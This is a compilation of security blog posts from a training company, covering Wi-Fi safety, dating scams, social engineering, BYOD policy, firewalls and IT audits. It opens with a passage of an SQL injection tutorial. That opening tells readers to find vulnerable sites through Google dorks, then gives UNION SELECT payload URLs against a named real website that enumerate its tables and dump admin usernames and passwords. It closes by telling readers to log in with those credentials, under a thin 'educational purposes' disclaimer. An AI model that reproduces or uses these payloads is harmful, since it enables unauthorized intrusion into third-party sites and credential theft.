- SQL’s can be used to alter or modify data in the database. And as you know when data is altered, the integrity is lost and issues regarding repudiation can come up such as voiding transactions, altering balances and other records.
- The database of web servers are configured to allow the arbitrary execution of operating system commands. When are conditions are present, a malicious user can use SQLi to bypass firewalls and penetrate the internal network.
Using SQL Injection to Hack a Website
Now let us see how we can use SQL injection to hack websites
The first thing is to search google for “google dorks”. I have gotten the following results from my search. You can as well search for yours.
This is just a few of the basic dorks that are available but you can also create your own dorks in order to find websites. These dorks can help you find out sites that are vulnerable to SQL injections in order to bypass the authentication.
Search google for SQL-vulnerable websites. Next thing is to open one of them to check if they can be vulnerable to SQLi’s.
I will use this website as an example.
Now after you choose your link, make sure it is different from mine because there are many available sites.
Please note, that this practical session is just for educational purposes and therefore I do not in any way take responsibility for your actions.
Now lets check if the site I have chosen is vulnerable to SQL or not. This can be done by putting this code behind the URL
.php?id=44 (You can copy and paste it with an apostrophe (‘) at the end of that code.
If after you do this and you get a result like this;
- “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1.”
Then bingo, then site is vulnerable an SQL injection attack. Therefore, we can go ahead to the next step.
In this step, we have to check the number of columns that are available on the database of the website. We can manually input these numbers, so we can check the columns;
http://www.tadspec.com/index.php?id=44 order by 32
Please note that the number “32” is an arbitrary number and it varies depending on the number of columns you may find. So, you have to make an arbitrary attempt to check the columns that are available on the database.
After putting “32”, this is what you get
Unknown column ‘32’ in ‘order clause’
And if we put the link below in URL,
http://www.tadspec.com/index.php?id=43 order by 31
This will redirect us to the website’s homepage which means that it is working correctly.
It therefore means that the number of the columns available on the database of this website is 31.
In this fourth step, we’re going to be determining the version of the database.
We will use the following query;
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,6,7,8,9,10,11-
When you run this query, you will get a number that shows boldly on your screen. Mine is 6. So, in the place of 6 in your URL, replace t @@version. This will give you the version that would give you the version of the SQL database that the website uses.
So, you have something like
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,@@version,7,8,9,10,11-
We will use the next query ‘group_concat(table_name)’ on the place of column#6 and some other string in the last part of the code.
So, its going to be like this;
http://www.tadspec.com/index.php?id=null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.tables where table_schema=database()-
Now the result of this query will be the names of the database tables. You can just copy them if you desire to use them for further analysis.
We will now try to find the column names in the database by changing the table to column in the fields.
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.columns where table_schema=database()-
When you enter this query, the result you will get will be the names of the different tables that are present on this website.
Recall that in the previous step, we were able to get the names of the columns in the database so the next thing is to search for the column called “credential” because it can be used to retrieve sensitive data such as usernames and passwords. These are the columns that give access to the database.
Use this query to navigate there;
http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11-from admin-
The group_concat() method was used to pass the username and then the 0x3a which is used for space and then the other column name. We removed the query and wrote admin table at the end of it and it means we are using the column names from the admin table.
If you have succeeded in this, then Congratulations you successfully performed an SQL injection.
Go ahead search the website login page and input those credentials in the fields present.
Please note that this tutorial is strictly for Educational purposes. We at SOUTECH are not responsible for your actions.
I have withheld some of the diagrams and pictorial explanations and if you must learn about them, enroll to our CEH course to learn comprehensively about this subject topic and more. Call us today.
Some people have a habit of not reading through the Terms of Service whenever they want to get a new application or buy a new device. I must let you know that this is a big mistake because most of the apps that are available in the market commonly known as graywares rely on you to get access to your personal information. The developers know that a lot of people do not read through the Terms and Service so they often include languages that are capable of authorizing a massive invasion of privacy. You may have noticed at the same time that most of the Terms and Services are just boilerplates. Now how do you read through a Terms of Service in order to find out what it is it as concerning privacy without having to waste a lot of time on reading standard terminology?
What are Terms of Service?
The Terms of Service commonly abbreviated as ToS is legal document b\used by websites and internet service providers (ISPs) that contain user’s personal information like social networking services and e-commerce.
Elements of Terms of Service?
A typical ToS contains the following
- Definition of keywords and phrases and disambiguation.
- Rights and responsibilities of the User.
- Expected/proper usage or a potential misuse
- Accountability for all online actions, conducts and behaviour
- Details concerned with payments like membership or subscription fees etc
- Policies for opting out-detailed procedures for opting out.
- Arbitration carrying details of how the dispute is to be resolved and the extent of rights to take issues to court.
- Notification of the user whenever any modification is made.
There is a second problem you may come across while reading through the ToS, which is the fact that the Terms of Service are usually written in legalese. This makes understanding some worth difficult even for people who are in the habit of reading such documents.
- Access and Correction: This is the part that details out who can access your data and who the data can be shared with and the circumstances.
- Consumer choice: It provides an opt-out option as to how consumers may disclose their personal information to any unaffiliated third party agent.
- A comprehensive list of what kind of data is required from you. There are some kind of information organizations have to collect from you in order to make their products function for you. They always have to tell you what the type of data that should be collected from you.
- A list of all the persons they are sharing information with and why they should share the information. The general language here will be vague such as third parties.
But under what circumstances should your data be collected from you? And do they only share this with companies that have security policies and is it done in the course of a normal business transaction?
Now, if there are not properly explained clauses as to who these third parties actually are and when they can share your personal data, then this can be a big warning signal for you.
- If you have any doubts, be sure to send an email to the customer service of the provider with all your questions clearly outlined. Reputable organizations or companies will normally and most likely answer all your questions promptly.
Sometimes the problem may not be that the company does not want to answer your questions or do they have an intention to do some nefarious with your personal data. It might just be that they are not taking seriously your internet security and privacy seriously enough. This can be just a type of lax security which sets you and them up for a major security breach.
As parting words, it is very important that you take a little time to read through licensed documents and terms of services. At least scroll through for a minute before checking the “i agree” box. Subscribe to learn our security course at SOUTECH Ventures where you will thought and equipped on things you need to know in order to become security conscious. Call us today to get a certification in CEH.
Having Wi-Fi readily available in public places has become a trend in larger cities of the world. Public places such as restaurants, coffee shops, libraries, hotel rooms, auxiliary offices, airports and other places you can think of have all adopted the use of Wi-Fi. Having a free and easily accessible internet connection to use can be a very convenient way of catching up with your work, meeting targets, accessing your online accounts, checking your mails etc. However, we seem not to know to the security risks associated with the use of publicly available Wi-Fi’s. Well, like you know already that one of best ways to optimally and speedily access your sensitive information and carryout sensitive transactions through Wi-Fi, there are some measures you need to take additionally in order to kept safe online which is the purpose of this write up.
According to a popular research journal published by Norton, said that over 68% people fell victim to publicly available and unsecured Wi-Fi’s in the last year. Therefore, we must take practical measures and efforts to make sure our devices are kept safe and protected.
Brief History in the encryption standard adopted by the Wi-Fi
Let me shade some more light on the encryption protocols and standards that existed before the encryption protocol adopted for use by Wi-Fi’s. One of the security problems faced by older encryption standards is in the aspect of security which was adopted by some wireless networks. One of the first encryption schemes for wireless network devices was the Wireless Encryption Protocol (WEP) and this encryption standard was found to be weak and very easy to crack. Although the WEP protocol is still regularly found as an option in many wireless access points and devices, there is need to give way for upgrading hardware that will be supported by newer standards whenever it is possible.
WEP was developed with the intention to manage the following;
- To prevent eavesdropping in communications which aims at reducing any forms of unauthorized disclosure of data.
- To ensure data integrity while it flows across the network.
- Encryption of packets during transmission using a shared secret key.
- To allow access control, confidentiality and integrity in a lightweight and efficient system.
However, WEP failed in handling some of these issues which birth WPA.
The Wireless Protected Access (WPA) came as a successor to WEP and was birth with the intention of checking and curbing the many issues faced by the WEP standard. This is the reason why its encryption abilities addressed some vulnerabilities however it was being found vulnerable and cracked. It was designed not to required full hardware upgrades as compared to the WEP.
However, its processing power and mechanisms were being limited especially where older versions of hardwares were involved. The TKIP standard was one of the standards developed to platform the WPA. TKIP was an improved standard for the WEP protocol because at every point there is a static and unchanging key being used for every frame transmitted.
WPA however suffered from the following flaws;
- Weak key selection by users
- Issues of packet spoofing
- Issues with authentication as regards Microsoft Challenge Handshake.
This gave way to the WPA2 standard intended to address the flaws in WPA. WPA came with a stronger and tough encryption standard which are CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) and AES (Advanced Encryption Standard). It also employs the TKIP Temporary Key Integrity Protocol and MIC (Message Integrity Code) as encryption standards.
This enterprise is a version that incorporates the EAP standard as a medium to improve the strength of the security and also make the system scalable for use in large organisations and enterprises. WPA2 is special because it offers an improved security when compared over its predecessors and maintains the IEEE 802.11i standard for security. It uses a server to carry out its key management and authentication for its wireless clients.
The WEP, WPA and WPA2 all suffer serious vulnerability issues which an attacker can exploit in order to take advantage of the victim. All of them offer ways to be exploited in recent times.
Why Public Wi-Fi is Vulnerable to cyber attacks
Given all the risk associated with all the protocols described above, users still suffer a great deal from unknown and known flaws. The fact that you may need a password to log in to access the Wi-Fi does not mean that your activities online are encrypted and that a publicly available Wi-Fi is secure. There a few issues that make public Wi-Fi’s susceptible to attacks and one of the issues related to the encryption protocol which the Wi-Fi technology adopts. Another issue has to do with the possibility of connecting to a rogue Wi-Fi hotspot. Tools like Aircrack-ng have been built and are readily available online to perform brute force attacks on any weak passwords and keys involving WEP and WPA.
The risk of joining a rogue Wi-Fi hotspot is also a big issue when using free public Wi-Fi’s. All a hacker has to do is to create a rogue hotspot with the intention of unleashing a sort of Man-in-the-middle (MITM) attack on whoever becomes a victim by connecting to the rogue Wi-Fi. When this attack occurs, it allows a hacker to intercept the communication that goes on between you and the server of the website you are visiting at a time. There are pre-built tools that can be used to easily eavesdrop, capture sensitive information like login credentials, credit card numbers and social media security passwords etc. and monitor online traffic for performing MITM attacks
What are the signs that you may have logged on to a Rogue Wi-Fi?
Of course, you know that once a device discovers a Wi-Fi network it probes the known networks which an attacker can leverage on. An attacker can configure a rouge Wi-Fi hotspot which can look like a typical home network that can be found in a coffee shop. Therefore, your device can be connected to the hackers’ rogue Wi-Fi hotspot instead of connecting to the real publicly available Wi-Fi hotspot.
Another trick you should know is that, a public Wi-Fi network can be created with the name Free Wi-Fi which is flooded for victims to be connected to them and very naturally people will want to join such networks especially if the free internet service is offered. I must say I personally has been a victim to this a few years ago. If you are at a coffee shop, or at home or in a public place and suddenly your device shows you have been connected to your home network, there are huge chances that someone has been able to grab your devices’ or computers broadcast request. If also you are browsing a website or webpage such as your bank or favorite social media page that should normally be HTTPS instead it shows HTTP, then you must know that someone might have connected to your network. Once this person has linked up to your network, the person can perform a MITM attack by serving you a HTTP version of the site with the intention of capturing your login credentials. So, you must always be on the lookout these little details.
What are the Measures you can take to ensure your safety on a Public Wi-Fi?
- Accessing Sensitive information using public Wi-Fi: I will as a matter of fact always advice anyone never to use public Wi-Fi’s to access their sensitive information. If there is need at any point in time to access your sensitive data online, you need to switch you’re your local ISP or get someone to pretty much share their device hotspot with you. You can do use the public Wi-Fi to browse for things like directions and other things that are less sensitive like getting information from google, bing or yahoo. If you’re trying to process things like paying of bills or even shop online, these things can wait. If it is an urgent situation which you need to achieve, the use of a VPN (Virtual Private Network) is advised. There is a plethora of trusted VPNs online and obviously if you need a good service, then you need to pay for such VPNs. Ensure you choose a reputable VPN security provider.
- Use VPNs (Virtual Private Network): If there is a need to use a publicly available Wi-Fi to do your work and your company or organisation offers a VPN access, ensure to make use of it. VPNs provide a private tunnel for you to transmit or communicate by adding an extra layer of security for your connection.
- Visit HTTPS only: If you are using a public Wi-Fi, ensure to avoid websites that are HTTP (not protected or secure) and visit or browse websites that begin with HTTPS.
Why am I saying so, if you are an IT expert, you not, you must know that HTTPS are encrypted and provide an extra layer of security which makes browsing more secure. If you connect to an HTTP site which is unsecure, a hacker can easily see your traffic if he snoops around the network.
- Consider installing an extension such as HTTPS-Everywhere in order to re-route all the websites you visit to HTTPS. There is a tool offered by the Electronic Fronteir Foundation which provides this option.
2.Configure wireless settings on your device: Configure your device not to connect automatically to any available Wi-Fi hotspots. This can be done by navigating to the wireless settings of your PC or device. This setting makes sure your device does not automatically and unknowingly gets connected to any public network. On your PC, just turn off the “connect automatically” option. When you do this, you prevent your device from broadcasting to the world that it is attempting to get connected to the “home network” which a hacker can easily spoof.
- Use Privacy screens: Hackers are everywhere and are usually not afraid of using any means possible to access and obtain your data, you must consider making use of privacy screens if there is a need to access sensitive information in a public place.
In general terms, whether or not you are using a your smart-devices or PC’s to access some sensitive information like accessing your bank account and financial information, always ensure not to do it in a publicly available Wi-Fi network. Ensure to consider all the tips above to keep your information protected online.
Soutech ventures offers a comprehensive information security course such as (CEH and CISSP) which can give more security insights, tools/tips and countermeasures in the different facets of technology. Subscribe to our services today.
In the past 3years, Nigerian singles have flocked dating sites and took to social media to employ their services in searching for partners. Online dating has outgrown all the stigma it used to have in the past as a research by psychologist and counsellors have found that one out of ten Nigerian single person has veered on to social media and online dating sites on their mobile apps and PC’s to get hooked up with people. Since the negative stigma attached to the online dating has gradually been phased out and nearly going into extinction, the popularity of these services has been on the rise and has caught the attention of hackers and scammers.
Recently in Nigeria, a lot of hackers and scammers have taken to social media platforms to trick people into giving sensitive and personal information. I have a made a personal study on this and from reading experiences from people and it has become of concern for me the reason behind this article. Apart from phishing scams and other vices that hackers have adopted to take advantage of unsuspecting victims, online dating has become one of the tools of meeting the emotions of people to exploit them.
The intention of this article is not to talk about dating and online dating or its sort but to give you tips on how to protect your privacy online.
Privacy Protection Tips
Creating of new user accounts
Create a username different from any other account that you have ever had and used. Now you may be wondering why you should do this, this is because a username can be searched easily and any account related to it, so this is the reason why you usually need a totally different account.
Images and photos uploaded
The same applies to photos and the images that you post on your social media profiles. You should try as much as possible to make sure that any reverse image searches performed on you will not work.
Opening Email accounts
Ensure to setup a free email account to use on the dating accounts with a unique name. Note that most sites provide features that offer users anonymity protection via their own in-site messaging products.
Using Free Google voice accounts for Calls
If you must do a phone call, open a free google voice account that will generate a different phone number for you and then go ahead to forward it to your mobile. By doing this, you have been able to secure your phone number that will enough to give you your potential match.
Use Reputable Online Dating sites
Always research properly and subscribe to popular and reputable online dating sites if you must use them. You can either delete or disable an account which come sites actually allow you. And since the site retains your previous information, you can always return to the online dating sites whenever.
Check website privacy policies
Ensure to check the sites privacy policies and try to verify how information with these sites are being handled. Some of these sites by default make profile pictures and profiles public which can be easily indexed by any search engine. There is a popular website that was penalized recently for secretly trying to experiment with their user’s data.
The fact that users have to pay to use their services for communication, this has reduced the rate of scammers and illegitimate daters. Note that some of these sites perform background screenings for criminals.
How can online dating scams be spotted?
Now that you have known some of the do’s and don’ts of the social online dating sites, now I will teach us how to spot any form of scams that you may be exposed to know.
- I have heard people say someone comes up to them with some stories to get to their emotions. Now this is one popular trick by scammers in that an individual can add up and start giving you some sad stories like “ I am stranded in a foreign country at the moment, my family has an emergency and needs immediate attention”. The endpoint of this story is request for some amount of money from you. Once you see this, immediately report such accounts to the service and do well to block such.
- Another trick I apply is to request a recent photo of the person I am chatting with in order to verify their identity. If in anyway they come up excuses or start a sort of protest as to the know why they won’t be able to provide the photo, the best thing to do is to run for safety and apply caution at once.
- If you been chatting with and familiarizing a supposed sweetheart for some time and you observe that they avoid any real-life meetings and dates, this could be a warning signal to take note of.
- Do not click open any links that is sent to you by anyone you have not been chatting or communicating with as well as from the ones you’re in frequent chats with. A scammer can appear to be a contact and try to get you to click the links which may redirect you to a pornographic site or webcam site and even malware infected sites.
- Be careful about your behavior and your outfit if you want to engage in any sort of webcam or video chat. A criminal will want to record these sorts of sessions in order to blackmail you with it. You can disconnect from any form of communication or chat sessions that makes you uncomfortable.
- Scammers use bots to create fake profiles that run their accounts with the aim of getting you to click these links that redirect you to unwanted sites described above. Some of them can even be programmed to steal your credit card information. Well, you can easily spot a bot because they are programmed to give out a set of predetermined responses. When you observe that you are not getting direct replies to your conversation, then there are chances that a bot has been set in.
The term catfishing is a scamming trick in which a user takes the identity of another person. This scamming has been adopted by scammers and cyber criminals to lure people into online romantic relationships and friendships.
A typical catfisher will always come up with excuses as to why they can’t have dates, call you in phone or even do video and webcam chats. It probably is true if the user’s profile appears too real that a lie. What you can do is to perform a reverse online image search of their photo and if they seem to be a place which is different from the one showing in their profiles then congratulations you have been able to catch a catfish.
As a parting word, we are in the age and era of the internet where we can order just anything from online. And as it is in all facets of life to have scammers and tricksters, scammers and hackers are in strong search of loopholes to exploit online users. But I have and will always do my bit in keep u appraised with all the techniques they can possibly come with to trick you. All you have to do is subscribe to all the tips I have given out in this article and you can safely be online and keep your relationships going on just fine.
Subscribing to our CEH course in Soutech ventures gives you an added edge to stay one step ahead of hackers and cyber criminals all over the world.
What is Social Engineering? Protect Yourself and Organization from all forms of Social Engineering-SOUTECH NigeriaEsang U. E
Vulnerabilities in softwares have been widely discussed and looking at it from the human perspective, human emotions play a large part. Anytime someone is faced with a scary or frightening scenario, their first reaction to it matters a whole lot.
Social engineers leverage on this type of vulnerability to launch successful attacks on victims. I am going to discuss in details what social engineering is all about and its different forms as this particular vulnerability stands at 80% when it comes to the techniques which cybercriminals perpetrate attacks.
What is Social Engineering?
Social engineering is a technique whereby cybercriminals make use of human interactions to trick users into giving out sensitive information such as personal credentials.
Types of Social Engineering
The fact that social engineering leverages on the human nature and emotions to perpetrate, attackers have deployed many techniques to trick users both online and offline. Here are a few techniques you should know about;
Phishing is one of the oldest cyber tricks and has been grown to be one of the most popular most successful means of exploiting computer users. In phishing, cybercriminals usually attempt many tricks and methods to get information from you. Recently, they have resorted to using scare tactics which can come in form of an urgent situation which requires your attention usually having to do with your banking details or your other online accounts. Users therefore will have to make decisions based on fear and how they feel at the time the scenario is simulated.
Emails that seem to be from a legitimate authority such as your financial institution or your company will be sent to you requesting your username or password in order to get login access. Normally, people tend to react to when issues involving their finances or jobs are involved especially when it appears to come from a higher management. I will reiterate that one major phishing tactic is in the sense of urgency applied to these messages. I have written comprehensively on the forms and techniques of phishing so you can look it up. Read more on phishing
Now let’s look at this technique which involves cybercriminals leaving a malware-infected USB or external devices in a public or open place. They leverage on the curious nature of humans such that when someone out of curiosity picks up this device and plugs it onto their computer systems in order to see what information is on it. Once they do this, the malware automatically gets injected into their computers.
In pretexting, the cybercriminal fabricates some very emotional stories and scenarios that tend to get to the emotions of their victims. Sometimes the stories can come in form stories of being stranded in a foreign country and sometimes can be that they are princes or princesses in their countries and their Father just passed away. They then try to tell the victim to please help them with a sum of 500USD or more in order to take back the throne. Like I said, these type of scenario tends to get to the emotions of victims who may always want to help. Pretexting is used alongside other methods as most of the techniques are targeted towards getting to the emotions of the victim or the cybercriminal attempts to impersonate someone on the telephone.
Hacking Emails and Spamming of Contacts
It is in the human nature to be inclined towards the affairs of their family and people they seem to know. For example, if my brother sends me an email message that comes with a subject that says “Look up this website, you may find something of interest” I normally wouldn’t resist checking it out by clicking open. Now this is the reason why a cybercriminal will try to leverage on this technique by using emails addresses and passwords. Immediately the victim’s personal credentials are obtained by the cybercriminal, they are take total control of the users account and will further more spam all the contacts that are on the users’ list. Always remember that the main objective of this attack vector is to spread malware with the desire of tricking people into giving out their personal data.
This technique of all the methods mentioned so far and beyond involves the most of human interactions. In vishing, the cybercriminal puts a call through to an employee of an organisation faking to be a trusted individual to the organisation. They can pose to be a representative from the bank or other highly profiled company’s related to the organisation of the victim proposing to do a business with them.
Their aim is to try to get as much information as possible from the victims. They can even pose to be a fellow employee with a lost or misplaced password and request for their passwords and may try to sound legitimate by asking questions to verify the identity of the victim.
Quid Pro Quo
This is also referred to as something-for-something. This technique involves attempting to entice users with winning prizes, products or getting discounts on purchase of expensive products. This scam is fashioned such that the users can only get something only after they have completed a form which requires mostly your personal data. The information gathered can then be used to perpetrate other attacks such as identity theft etc.
This is a technique that is related largely related to phishing and can be referred to as phishing’s complex cousin. In spear phishing, the cybercriminal targets the employees of an organisation and does some reconnaissance on them online with the aim of getting personal information.
Information can be gotten from internet searches and social media platforms via profiles. Once they have been able to get details personal to them, they can then start sending emails that may seem very necessary and of interest to them in order to entice them. Such that once they click the links sent to them, the malware file attached can be downloaded to their system. Once the cybercriminal successfully tricks the user, the malware is installed on the user’s computer which can be spread throughout the network to other computers on the company network.
This is more like a long-con where the cybercriminal tries to establish a relationship with a target. They usually go through their targets social media profiles in order to establish a relationship and gather as much as information that will help them perform an attack.
This attack form typically depends on pretexting because the attackers aim is to have prolonged conversations with the target in order to extract as much information as possible.
This is a shorter version of all the attack forms. The cybercriminal will typically use baiting, phishing and email hacking to extract information from a chosen target passively (i.e. with no direct contact or with little interaction as possible).
Social engineering has taken over all forms, both online and offline and therefore has become very difficult to control or cut off its threats. Therefore, your best defense mechanism against social engineering is to educate yourself and your employees if you run an IT-driven organisation. You should also be aware and lookout for any possible attack methods that may come.
We have a comprehensive course that can help you learn more on how to protect yourself from social engineering and other attack forms. Subscribe to our CEH course today in SOUTECH.
In a recent survey by Symantec, it said that about three to four small and medium-sized organization owners have adopted smartphones and tablets as a core part of achieving their teams’ success. Since the use of these devices are gradually expanding, therefore there is a need to provide an apt security for them. This is the main reason why organizations have adopted the bring-you-own-device concept an approach that is commonly referred to as BYOD.
The fact that smartphones and tablets have grown into consumer markets have made a lot of employees choose employ the Bring-Your-Own-Device concept to their places of work. So, I’ll be giving you a few tips on how to stay protected on the internet as mobile devices have become a core entity in many organizations.
Therefore, the idea of developing a sound and efficient BYOD policy that can assist in gaining a maximum productivity in your organization or your company.
These are a few things I will buttress on this point which are the necessities for every organization;
1.Assessing the needs of Your BYOD
One of the key things you can do is to brief or engage your employees and staff in talks regarding the use of their devices in the organization for business transactions. The things you need to find out are;
- Do they access the company server and read emails related to work or the business?
- What operating systems and the devices they employees use in order to access their network?
This information will guide your policies and help you to dictate the scope of your policies and the measures you can take to secure your devices. It can also help you to in making choices of the security softwares you can deploy to protect their devices.
2. Always Educate Your Employees
Endeavour to talk to your employees and team members on the potential risks of using mobile devices in and out of the office including the importance of managing these any related risk. It must be made compulsory for employees to follow security best practices, which include:
- Employing the use of complex passwords for their devices and for any program that is related to work which are accessed using those devices.
These passwords can be set by navigating through the device’s settings. Learn more about creating strong passwords.
- Employing a regular password changing policy. For example, changing passwords quarterly or every 90days. You can use password manager services like KeePass or LastPass which is capable of helping employees manage multiple and regular password changes.
- Always ensuring that system updates and app updates are done once the device prompts for them. This is done in order to protect against any possible security vulnerabilities.
- Being on the lookout for phishing text messages and emails which can be avoided by avoiding to click on such links that prompt them to download files and documents from unknown pages.
- Doing a thorough research on applications before having to download them unto devices. Employees should be discouraged from downloading applications from unofficial or third-party app stores.
3. Strong Protective measures must be implement
Products that will assist employees to build their strength and ability of their devices when used for business should be explored. A very good tool is the Norton Small Business software that performs the function of protecting mobile devices against malwares associated with mobiles.Research has had it that many devices running on Android platforms carry potential malwares and privacy loopholes and greywares which are capable of hindering productivity. However, there have been new products that provide more security including remote locate and lock and wipe features. These features allow mobile users to manage their device security from a central web portal. Consider using a VPN (Virtual Private Network) service if the employees access the company’s network remotely with their mobile devices. A VPN creates a tunnel that is encrypted in the internet which allows traffic to pass through it. There are mobile apps that allow users to connect to a VPN via their mobile devices or smartphones.
4. Acceptable Use should be properly defined
Guidelines should be outlined to clarify and define how employees can use their devices during business hours for business purposes. For instance, you may employ a pervasive policy by allowing your team members to access documents and emails, but prohibiting them having access to sensitive files such as financial data. Websites and apps that are prohibited from accessing with the company VPN during work hours should be specified.
5. Decide how these Guidelines are Enforced
Setup due consequences for any member of your team who goes against any of the outlined policies. Measures could be that if anyone accesses those prohibited apps or softwares during business hours it could result in warning and if anyone downloads or stores confidential files from a malicious app, such persons will not get funding for their mobile devices.
These measures should be outlined clearly with how any potential violations will be handled.
If you run a business or an organisation that encourages the BYOD policy, thinking through these steps and few tips should be able to guide you through building a firm foundation and an effective way to manage your infrastructure and protect it from any possible security breaches.
You can learn about a lot of more tips on how to better manage your infrastructure along proper auditing skills from SOUTECH ventures. We offer the best IT consulting solutions to our clients in Abuja, Lagos and Port Harcourt. Subscribe to our Ethical hacking course and learn more.
Protect your Infrastructure-Know the Importance of Firewalls : SOUTECH Cyber security training program Nigeria, AfricaEsang U. E
A firewall just as its name implies is a protective barrier whose function is more like a physical firewall. The firewall lies just between the computer and the connection it has with the internet to provide protection from any form of online threats.
A firewall is a software program or a piece of hardware device that is programmed to provide security for your computer by placing limitations on information that you can receive from an external network. A firewall is designed to either allow or block information coming in or out of a network based on certain security policies.
The term firewall came into the cybersecurity world as a borrowed term from the word firefighting where an effort is made to prevent the spread of fire.
Organizations actually started moving from the use of mainframe computers and dumb clients in a client-server model and therefore the need to put a control over the server became a top priority. Before the introduction of firewalls in the late 80’s, the only form of protection from the outside world was the use of Access control lists (ACLs) resident in routers. The function of the ACLs was to choose which IP address to grant or deny access to a certain network.
Due to the swift growth of the internet and increased rate of connectivity of people and organizations to networks, it gradually meant an end of the ACL as a filtering method which was not enough to keep of malicious traffic. This was so because basic about network traffic was embedded in the packet header. The first organization to deploy the use of firewalls to tackle the threat of cyberattacks was the Digital equipment Corp (DEC) in 1992.
Types of Firewall Techniques
- Packet Filter Firewalls: This type of firewall handles the packets going in or out of the network based on pre-defined rules by the user. The packet filtering ability is fairly transparent and effective to users however can be difficult to configure. It is however very susceptible to IP spoofing.
- Application gateway Firewalls: This type of firewall applies security configurations to specific applications like the Telnet and FTP servers. The application gateway firewall is very effective but can impose some performance degradations.
- Circuit-level Gateway firewalls: This firewall type applies its security configurations when a TCP or UDP connection has been established. Therefore, once this connection is established, the packets begin to flow between the hosts without any further verification.
- Proxy Server Firewalls: This firewall type intercepts all the messages that go in and out of the network. The proxy server firewall cascades or hides the real network address of the host.
The benefits of a firewall
- It prevents any unauthorized user from an external network from gaining access to your internal network i.e. your computer in your network.
- It monitors all forms communications that goes on between your computer and other computers outside of you network and over the internet.
- It establishes a protective shield that either allows or blocks any attempt to access data or information on your computer.
- It sends out a warning when any other computer tries to connect to you.
- It also warns against any illegitimate connection by an application on your computer that gives access to other computers.
The Limitations of a Firewall
Firewalls however have not been able to determine the contents of email messages that are sent to your computer so they cannot you from malware sent through phished emails.
- The need for antivirus softwares that can detect, quarantine or delete suspicious email attachments
- Learn to protect yourself from phishing scams
If you have a private network, ensure that you protect your devices by configuring the firewall settings on your computers and wireless router. You can also add an extra level of security to your personal computers by using security softwares. However, even if your wireless network may seem secure, it may not be secure from other types of malware that can be gotten from computers through the internet.
Build your firewalls such that it can defend you against hackers and viruses. You can do this by always ensuring that your firewall is turned on. You can configure the firewall settings in the security and privacy section which can be found under your systems preferences section.
Also ensure to do regular updates of your anti-virus software as an extra security measure. Please note that firewalls and anti-viruses are not the same thing
Finally, asides the protection a firewall offers you, learn safe online practices.
If you need to learn about firewall configurations, and purchase latest and licensed anti-virus softwares contact us at soutech ventures. Subscribe to us today for all types of IT trainings and consultations you may require.
An IT audit is an audit that deals with the review and evaluation of all automated and non-automated information processing systems and all the interfaces that it encompasses. It also includes setting up management controls for information technology and infrastructures.
The elementary function of IT audits includes, evaluation of systems that are already in place to guard the organization’s information. It looks into the ability of an organization to protect its assets as well as be able to legitimately and adequately give out information to authorized parties.
The process of planning IT audits involves two key steps
- Gathering information and planning
- Gaining an understanding of the already existing internal control structures
Many organizations are gradually phasing towards the approach of risk-based audits which is used for risk assessment and to help the IT auditor to decide on whether to carry out a compliance and substantive test. The risk based approach involves the IT auditors relying on the internal and operational controls and also the knowledge of the organization involved.
These are the 5 aspects that an IT auditor needs to identify when gathering information:
- Good knowledge of the business and industry
- Previous results obtained from all the years
- Recent financial data
- Already existing standards and policies
- Inherent risk assessments
Inherent risk here refers to the risk that there is an error that could be a function of combined errors that are encountered during this audit assuming there are no controls in place.
Once the auditor has gathered relevant information and has an understanding of the control, then they are ready to start planning or select areas that need auditing.
Why is it important to do an IT Audit?
Hardly will you find an organization in recent times that is not IT driven. A lot of organisations today are investing huge amounts of cash on their IT infrastructure because they have come to realize the tremendous importance of using IT in their business services and operations. As a result of this, they need to always make sure that their IT systems are very secure, very reliable and is not susceptible or vulnerable to any form of cyber attacks.
The importance if an IT audit can never be over emphasized because it provides the assurance that the IT systems deployed by the organization is well protected, is available at all times, properly managed to get the required results and that it gives out reliable information to users. Many people use and rely on IT without knowing how it works and that a computer can make errors repeatedly and incurring extensive damages than a human being can. An IT audit is also very important in reducing risk of data leakage, data losses, service disruptions and ill-management of an IT infrastructure.
The Objectives of an IT audit
The objectives of an IT audit often focus on substantiating that the existing internal controls and are functioning as expected in order to minimize business risk. The objectives include
- Assuring compliance with legal and regulatory standards
- Ensuring confidentiality
- Ensuring Integrity
- Improving availability of information systems
Confidentiality here relates to information security and refers to protecting information from being disclosed to unauthorized persons or parties. This means that information such as personal credentials, trade secrets, bank account statements are kept confidential and protecting this information plays a major role in information security.
The fact that information is valuable only when it has not been tampered with gives way to data integrity such that information is not modified by an unauthorized party. If information is inappropriately altered, it could prove costly for example, a transaction of 1000naira can be altered to 10,000naira. Making sure data is protected from being tampered with is a core aspect of information security.
Availability here means that information is made available to authorized individuals whenever it is needed. Unfortunately, the act of denying rights to resources to rightful users has been in on the rise lately. An information systems audit will therefore ensure confidentiality of an organizations data, data integrity and availability of resources. An IT audit therefore oversees the organizations IT systems, its operations and management processes.
The reliability of data from an IT system can as well have huge impact on the financial statements of an organization. There an IT audit must be able to
- Check for instances of excesses, gross inefficiencies, extravagance which has to do with wastage of resources in the management of IT systems
- Ensure that there is a high level of compliance with government laws as applicable to the IT system.
Types of IT audits
Different bodies and authorities have developed their views to distinguish the types of IT audits. Goodman and Lawless have outlined three systematic approaches to perform IT audits
- Technological Innovation Process Audit: This audit type attempts to construct a risk profile for already existing as well as new projects. It assesses the length, depth and presence of the technologies used by the company and how it relates to the relevant markets. It also looks into the way each project is organized, the structure of industry as regards its projects, products etc.
- Technological position audit: This audit type deals with the technologies that the business has on ground and what it needs to add to it. Technologies can be categorized into
- Innovative Comparison Audit: This audit deals with the analysis of the innovative capabilities of the organization being audited when compared to its competitors and rivals. The company’s research and development facilities as well as its track record of producing new products will be examined.
Other authorities have also categorized IT audits in 5 spectrum
- Information Processing Facilities: It is focused on verifying the processing ability of the facility and if it is designed under normal and disruptive conditions to process applications in a timely, accurate and efficient way.
- Systems and Applications: It is focused on verifying systems activity are controlled appropriately, efficiently and adequately in order to ensure its output at all levels are valid, reliable, and timely. This audit type forms a sub-type that focuses on business IT systems and also focuses on financial auditors.
